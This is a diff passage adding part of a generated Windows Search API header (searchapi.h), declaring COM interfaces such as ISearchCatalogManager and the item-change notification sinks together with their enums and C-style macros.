+#define ISearchCrawlScopeManager2_IncludedInCrawlScopeEx(This,pszURL,pfIsIncluded,pReason)	\
+    ( (This)->lpVtbl -> IncludedInCrawlScopeEx(This,pszURL,pfIsIncluded,pReason) ) 
+
+#define ISearchCrawlScopeManager2_RevertToDefaultScopes(This)	\
+    ( (This)->lpVtbl -> RevertToDefaultScopes(This) ) 
+
+#define ISearchCrawlScopeManager2_SaveAll(This)	\
+    ( (This)->lpVtbl -> SaveAll(This) ) 
+
+#define ISearchCrawlScopeManager2_GetParentScopeVersionId(This,pszURL,plScopeId)	\
+    ( (This)->lpVtbl -> GetParentScopeVersionId(This,pszURL,plScopeId) ) 
+
+#define ISearchCrawlScopeManager2_RemoveDefaultScopeRule(This,pszURL)	\
+    ( (This)->lpVtbl -> RemoveDefaultScopeRule(This,pszURL) ) 
+
+
+#define ISearchCrawlScopeManager2_GetVersion(This,plVersion,phFileMapping)	\
+    ( (This)->lpVtbl -> GetVersion(This,plVersion,phFileMapping) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE ISearchCrawlScopeManager2_RemoteGetVersion_Proxy( 
+    __RPC__in ISearchCrawlScopeManager2 * This,
+    /* [out] */ __RPC__out long *plVersion);
+
+
+void __RPC_STUB ISearchCrawlScopeManager2_RemoteGetVersion_Stub(
+    IRpcStubBuffer *This,
+    IRpcChannelBuffer *_pRpcChannelBuffer,
+    PRPC_MESSAGE _pRpcMessage,
+    DWORD *_pdwStubPhase);
+
+
+
+#endif 	/* __ISearchCrawlScopeManager2_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0015 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+typedef /* [v1_enum] */ 
+enum _SEARCH_KIND_OF_CHANGE
+    {
+        SEARCH_CHANGE_ADD	= 0,
+        SEARCH_CHANGE_DELETE	= 1,
+        SEARCH_CHANGE_MODIFY	= 2,
+        SEARCH_CHANGE_MOVE_RENAME	= 3,
+        SEARCH_CHANGE_SEMANTICS_DIRECTORY	= 0x40000,
+        SEARCH_CHANGE_SEMANTICS_SHALLOW	= 0x80000,
+        SEARCH_CHANGE_SEMANTICS_UPDATE_SECURITY	= 0x400000
+    } 	SEARCH_KIND_OF_CHANGE;
+
+typedef 
+enum _SEARCH_NOTIFICATION_PRIORITY
+    {
+        SEARCH_NORMAL_PRIORITY	= 0,
+        SEARCH_HIGH_PRIORITY	= 1
+    } 	SEARCH_NOTIFICATION_PRIORITY;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0015_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0015_v0_0_s_ifspec;
+
+#ifndef __ISearchItemsChangedSink_INTERFACE_DEFINED__
+#define __ISearchItemsChangedSink_INTERFACE_DEFINED__
+
+/* interface ISearchItemsChangedSink */
+/* [unique][uuid][object] */ 
+
+typedef struct _SEARCH_ITEM_CHANGE
+    {
+    SEARCH_KIND_OF_CHANGE Change;
+    SEARCH_NOTIFICATION_PRIORITY Priority;
+    BLOB *pUserData;
+    LPWSTR lpwszURL;
+    /* [unique] */ LPWSTR lpwszOldURL;
+    } 	SEARCH_ITEM_CHANGE;
+
+
+EXTERN_C const IID IID_ISearchItemsChangedSink;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF58")
+    ISearchItemsChangedSink : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE StartedMonitoringScope( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE StoppedMonitoringScope( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE OnItemsChanged( 
+            /* [in] */ DWORD dwNumberOfChanges,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumberOfChanges) SEARCH_ITEM_CHANGE rgDataChangeEntries[  ],
+            /* [size_is][out] */ __RPC__out_ecount_full(dwNumberOfChanges) DWORD rgdwDocIds[  ],
+            /* [size_is][out] */ __RPC__out_ecount_full(dwNumberOfChanges) HRESULT rghrCompletionCodes[  ]) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchItemsChangedSinkVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchItemsChangedSink * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchItemsChangedSink * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchItemsChangedSink * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *StartedMonitoringScope )( 
+            __RPC__in ISearchItemsChangedSink * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL);
+        
+        HRESULT ( STDMETHODCALLTYPE *StoppedMonitoringScope )( 
+            __RPC__in ISearchItemsChangedSink * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnItemsChanged )( 
+            __RPC__in ISearchItemsChangedSink * This,
+            /* [in] */ DWORD dwNumberOfChanges,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumberOfChanges) SEARCH_ITEM_CHANGE rgDataChangeEntries[  ],
+            /* [size_is][out] */ __RPC__out_ecount_full(dwNumberOfChanges) DWORD rgdwDocIds[  ],
+            /* [size_is][out] */ __RPC__out_ecount_full(dwNumberOfChanges) HRESULT rghrCompletionCodes[  ]);
+        
+        END_INTERFACE
+    } ISearchItemsChangedSinkVtbl;
+
+    interface ISearchItemsChangedSink
+    {
+        CONST_VTBL struct ISearchItemsChangedSinkVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchItemsChangedSink_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchItemsChangedSink_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchItemsChangedSink_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchItemsChangedSink_StartedMonitoringScope(This,pszURL)	\
+    ( (This)->lpVtbl -> StartedMonitoringScope(This,pszURL) ) 
+
+#define ISearchItemsChangedSink_StoppedMonitoringScope(This,pszURL)	\
+    ( (This)->lpVtbl -> StoppedMonitoringScope(This,pszURL) ) 
+
+#define ISearchItemsChangedSink_OnItemsChanged(This,dwNumberOfChanges,rgDataChangeEntries,rgdwDocIds,rghrCompletionCodes)	\
+    ( (This)->lpVtbl -> OnItemsChanged(This,dwNumberOfChanges,rgDataChangeEntries,rgdwDocIds,rghrCompletionCodes) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchItemsChangedSink_INTERFACE_DEFINED__ */
+
+
+#ifndef __ISearchPersistentItemsChangedSink_INTERFACE_DEFINED__
+#define __ISearchPersistentItemsChangedSink_INTERFACE_DEFINED__
+
+/* interface ISearchPersistentItemsChangedSink */
+/* [unique][uuid][object] */ 
+
+typedef struct _SEARCH_ITEM_PERSISTENT_CHANGE
+    {
+    SEARCH_KIND_OF_CHANGE Change;
+    LPWSTR URL;
+    /* [unique] */ LPWSTR OldURL;
+    SEARCH_NOTIFICATION_PRIORITY Priority;
+    } 	SEARCH_ITEM_PERSISTENT_CHANGE;
+
+
+EXTERN_C const IID IID_ISearchPersistentItemsChangedSink;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("A2FFDF9B-4758-4F84-B729-DF81A1A0612F")
+    ISearchPersistentItemsChangedSink : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE StartedMonitoringScope( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE StoppedMonitoringScope( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE OnItemsChanged( 
+            /* [in] */ DWORD dwNumberOfChanges,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumberOfChanges) SEARCH_ITEM_PERSISTENT_CHANGE DataChangeEntries[  ],
+            /* [size_is][out] */ __RPC__out_ecount_full(dwNumberOfChanges) HRESULT hrCompletionCodes[  ]) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchPersistentItemsChangedSinkVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchPersistentItemsChangedSink * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchPersistentItemsChangedSink * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchPersistentItemsChangedSink * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *StartedMonitoringScope )( 
+            __RPC__in ISearchPersistentItemsChangedSink * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL);
+        
+        HRESULT ( STDMETHODCALLTYPE *StoppedMonitoringScope )( 
+            __RPC__in ISearchPersistentItemsChangedSink * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnItemsChanged )( 
+            __RPC__in ISearchPersistentItemsChangedSink * This,
+            /* [in] */ DWORD dwNumberOfChanges,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumberOfChanges) SEARCH_ITEM_PERSISTENT_CHANGE DataChangeEntries[  ],
+            /* [size_is][out] */ __RPC__out_ecount_full(dwNumberOfChanges) HRESULT hrCompletionCodes[  ]);
+        
+        END_INTERFACE
+    } ISearchPersistentItemsChangedSinkVtbl;
+
+    interface ISearchPersistentItemsChangedSink
+    {
+        CONST_VTBL struct ISearchPersistentItemsChangedSinkVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchPersistentItemsChangedSink_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchPersistentItemsChangedSink_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchPersistentItemsChangedSink_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchPersistentItemsChangedSink_StartedMonitoringScope(This,pszURL)	\
+    ( (This)->lpVtbl -> StartedMonitoringScope(This,pszURL) ) 
+
+#define ISearchPersistentItemsChangedSink_StoppedMonitoringScope(This,pszURL)	\
+    ( (This)->lpVtbl -> StoppedMonitoringScope(This,pszURL) ) 
+
+#define ISearchPersistentItemsChangedSink_OnItemsChanged(This,dwNumberOfChanges,DataChangeEntries,hrCompletionCodes)	\
+    ( (This)->lpVtbl -> OnItemsChanged(This,dwNumberOfChanges,DataChangeEntries,hrCompletionCodes) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchPersistentItemsChangedSink_INTERFACE_DEFINED__ */
+
+
+#ifndef __ISearchViewChangedSink_INTERFACE_DEFINED__
+#define __ISearchViewChangedSink_INTERFACE_DEFINED__
+
+/* interface ISearchViewChangedSink */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchViewChangedSink;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF65")
+    ISearchViewChangedSink : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE OnChange( 
+            /* [in] */ __RPC__in ITEMID *pdwDocID,
+            /* [in] */ __RPC__in SEARCH_ITEM_CHANGE *pChange,
+            /* [in] */ __RPC__in BOOL *pfInView) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchViewChangedSinkVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchViewChangedSink * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchViewChangedSink * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchViewChangedSink * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnChange )( 
+            __RPC__in ISearchViewChangedSink * This,
+            /* [in] */ __RPC__in ITEMID *pdwDocID,
+            /* [in] */ __RPC__in SEARCH_ITEM_CHANGE *pChange,
+            /* [in] */ __RPC__in BOOL *pfInView);
+        
+        END_INTERFACE
+    } ISearchViewChangedSinkVtbl;
+
+    interface ISearchViewChangedSink
+    {
+        CONST_VTBL struct ISearchViewChangedSinkVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchViewChangedSink_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchViewChangedSink_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchViewChangedSink_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchViewChangedSink_OnChange(This,pdwDocID,pChange,pfInView)	\
+    ( (This)->lpVtbl -> OnChange(This,pdwDocID,pChange,pfInView) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchViewChangedSink_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0018 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0018_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0018_v0_0_s_ifspec;
+
+#ifndef __ISearchNotifyInlineSite_INTERFACE_DEFINED__
+#define __ISearchNotifyInlineSite_INTERFACE_DEFINED__
+
+/* interface ISearchNotifyInlineSite */
+/* [helpstring][unique][uuid][object] */ 
+
+typedef 
+enum _SEARCH_INDEXING_PHASE
+    {
+        SEARCH_INDEXING_PHASE_GATHERER	= 0,
+        SEARCH_INDEXING_PHASE_QUERYABLE	= 1,
+        SEARCH_INDEXING_PHASE_PERSISTED	= 2
+    } 	SEARCH_INDEXING_PHASE;
+
+typedef struct _SEARCH_ITEM_INDEXING_STATUS
+    {
+    DWORD dwDocID;
+    HRESULT hrIndexingStatus;
+    } 	SEARCH_ITEM_INDEXING_STATUS;
+
+
+EXTERN_C const IID IID_ISearchNotifyInlineSite;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("B5702E61-E75C-4B64-82A1-6CB4F832FCCF")
+    ISearchNotifyInlineSite : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE OnItemIndexedStatusChange( 
+            /* [in] */ SEARCH_INDEXING_PHASE sipStatus,
+            /* [in] */ DWORD dwNumEntries,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumEntries) SEARCH_ITEM_INDEXING_STATUS rgItemStatusEntries[  ]) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE OnCatalogStatusChange( 
+            /* [in] */ __RPC__in REFGUID guidCatalogResetSignature,
+            /* [in] */ __RPC__in REFGUID guidCheckPointSignature,
+            /* [in] */ DWORD dwLastCheckPointNumber) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchNotifyInlineSiteVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchNotifyInlineSite * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchNotifyInlineSite * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchNotifyInlineSite * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnItemIndexedStatusChange )( 
+            __RPC__in ISearchNotifyInlineSite * This,
+            /* [in] */ SEARCH_INDEXING_PHASE sipStatus,
+            /* [in] */ DWORD dwNumEntries,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumEntries) SEARCH_ITEM_INDEXING_STATUS rgItemStatusEntries[  ]);
+        
+        HRESULT ( STDMETHODCALLTYPE *OnCatalogStatusChange )( 
+            __RPC__in ISearchNotifyInlineSite * This,
+            /* [in] */ __RPC__in REFGUID guidCatalogResetSignature,
+            /* [in] */ __RPC__in REFGUID guidCheckPointSignature,
+            /* [in] */ DWORD dwLastCheckPointNumber);
+        
+        END_INTERFACE
+    } ISearchNotifyInlineSiteVtbl;
+
+    interface ISearchNotifyInlineSite
+    {
+        CONST_VTBL struct ISearchNotifyInlineSiteVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchNotifyInlineSite_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchNotifyInlineSite_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchNotifyInlineSite_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchNotifyInlineSite_OnItemIndexedStatusChange(This,sipStatus,dwNumEntries,rgItemStatusEntries)	\
+    ( (This)->lpVtbl -> OnItemIndexedStatusChange(This,sipStatus,dwNumEntries,rgItemStatusEntries) ) 
+
+#define ISearchNotifyInlineSite_OnCatalogStatusChange(This,guidCatalogResetSignature,guidCheckPointSignature,dwLastCheckPointNumber)	\
+    ( (This)->lpVtbl -> OnCatalogStatusChange(This,guidCatalogResetSignature,guidCheckPointSignature,dwLastCheckPointNumber) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchNotifyInlineSite_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0019 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+typedef 
+enum _CatalogStatus
+    {
+        CATALOG_STATUS_IDLE	= 0,
+        CATALOG_STATUS_PAUSED	= 1,
+        CATALOG_STATUS_RECOVERING	= 2,
+        CATALOG_STATUS_FULL_CRAWL	= 3,
+        CATALOG_STATUS_INCREMENTAL_CRAWL	= 4,
+        CATALOG_STATUS_PROCESSING_NOTIFICATIONS	= 5,
+        CATALOG_STATUS_SHUTTING_DOWN	= 6
+    } 	CatalogStatus;
+
+typedef 
+enum _CatalogPausedReason
+    {
+        CATALOG_PAUSED_REASON_NONE	= 0,
+        CATALOG_PAUSED_REASON_HIGH_IO	= 1,
+        CATALOG_PAUSED_REASON_HIGH_CPU	= 2,
+        CATALOG_PAUSED_REASON_HIGH_NTF_RATE	= 3,
+        CATALOG_PAUSED_REASON_LOW_BATTERY	= 4,
+        CATALOG_PAUSED_REASON_LOW_MEMORY	= 5,
+        CATALOG_PAUSED_REASON_LOW_DISK	= 6,
+        CATALOG_PAUSED_REASON_DELAYED_RECOVERY	= 7,
+        CATALOG_PAUSED_REASON_USER_ACTIVE	= 8,
+        CATALOG_PAUSED_REASON_EXTERNAL	= 9,
+        CATALOG_PAUSED_REASON_UPGRADING	= 10
+    } 	CatalogPausedReason;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0019_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0019_v0_0_s_ifspec;
+
+#ifndef __ISearchCatalogManager_INTERFACE_DEFINED__
+#define __ISearchCatalogManager_INTERFACE_DEFINED__
+
+/* interface ISearchCatalogManager */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchCatalogManager;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF50")
+    ISearchCatalogManager : public IUnknown
+    {
+    public:
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *pszName) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetParameter( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [retval][out] */ __RPC__deref_out_opt PROPVARIANT **ppValue) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SetParameter( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [in] */ __RPC__in PROPVARIANT *pValue) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetCatalogStatus( 
+            /* [out] */ __RPC__out CatalogStatus *pStatus,
+            /* [out] */ __RPC__out CatalogPausedReason *pPausedReason) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Reset( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Reindex( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE ReindexMatchingURLs( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszPattern) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE ReindexSearchRoot( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszRootURL) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ConnectTimeout( 
+            /* [in] */ DWORD dwConnectTimeout) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ConnectTimeout( 
+            /* [retval][out] */ __RPC__out DWORD *pdwConnectTimeout) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_DataTimeout( 
+            /* [in] */ DWORD dwDataTimeout) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DataTimeout( 
+            /* [retval][out] */ __RPC__out DWORD *pdwDataTimeout) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE NumberOfItems( 
+            /* [retval][out] */ __RPC__out LONG *plCount) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE NumberOfItemsToIndex( 
+            /* [out] */ __RPC__out LONG *plIncrementalCount,
+            /* [out] */ __RPC__out LONG *plNotificationQueue,
+            /* [out] */ __RPC__out LONG *plHighPriorityQueue) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE URLBeingIndexed( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *pszUrl) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetURLIndexingState( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out DWORD *pdwState) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetPersistentItemsChangedSink( 
+            /* [retval][out] */ __RPC__deref_out_opt ISearchPersistentItemsChangedSink **ppISearchPersistentItemsChangedSink) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RegisterViewForNotification( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszView,
+            /* [in] */ __RPC__in_opt ISearchViewChangedSink *pViewChangedSink,
+            /* [out] */ __RPC__out DWORD *pdwCookie) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetItemsChangedSink( 
+            /* [in] */ __RPC__in_opt ISearchNotifyInlineSite *pISearchNotifyInlineSite,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][out] */ __RPC__deref_out_opt void **ppv,
+            /* [out] */ __RPC__out GUID *pGUIDCatalogResetSignature,
+            /* [out] */ __RPC__out GUID *pGUIDCheckPointSignature,
+            /* [out] */ __RPC__out DWORD *pdwLastCheckPointNumber) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE UnregisterViewForNotification( 
+            /* [in] */ DWORD dwCookie) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SetExtensionClusion( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszExtension,
+            /* [in] */ BOOL fExclude) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE EnumerateExcludedExtensions( 
+            /* [retval][out] */ __RPC__deref_out_opt IEnumString **ppExtensions) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetQueryHelper( 
+            /* [retval][out] */ __RPC__deref_out_opt ISearchQueryHelper **ppSearchQueryHelper) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_DiacriticSensitivity( 
+            /* [in] */ BOOL fDiacriticSensitive) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DiacriticSensitivity( 
+            /* [retval][out] */ __RPC__out BOOL *pfDiacriticSensitive) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetCrawlScopeManager( 
+            /* [retval][out] */ __RPC__deref_out_opt ISearchCrawlScopeManager **ppCrawlScopeManager) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchCatalogManagerVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchCatalogManager * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchCatalogManager * This);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *pszName);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetParameter )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [retval][out] */ __RPC__deref_out_opt PROPVARIANT **ppValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetParameter )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [in] */ __RPC__in PROPVARIANT *pValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCatalogStatus )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [out] */ __RPC__out CatalogStatus *pStatus,
+            /* [out] */ __RPC__out CatalogPausedReason *pPausedReason);
+        
+        HRESULT ( STDMETHODCALLTYPE *Reset )( 
+            __RPC__in ISearchCatalogManager * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Reindex )( 
+            __RPC__in ISearchCatalogManager * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *ReindexMatchingURLs )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszPattern);
+        
+        HRESULT ( STDMETHODCALLTYPE *ReindexSearchRoot )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszRootURL);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ConnectTimeout )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [in] */ DWORD dwConnectTimeout);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ConnectTimeout )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [retval][out] */ __RPC__out DWORD *pdwConnectTimeout);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_DataTimeout )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [in] */ DWORD dwDataTimeout);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DataTimeout )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [retval][out] */ __RPC__out DWORD *pdwDataTimeout);
+        
+        HRESULT ( STDMETHODCALLTYPE *NumberOfItems )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [retval][out] */ __RPC__out LONG *plCount);
+        
+        HRESULT ( STDMETHODCALLTYPE *NumberOfItemsToIndex )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [out] */ __RPC__out LONG *plIncrementalCount,
+            /* [out] */ __RPC__out LONG *plNotificationQueue,
+            /* [out] */ __RPC__out LONG *plHighPriorityQueue);
+        
+        HRESULT ( STDMETHODCALLTYPE *URLBeingIndexed )( 
+            __RPC__in ISearchCatalogManager * This,
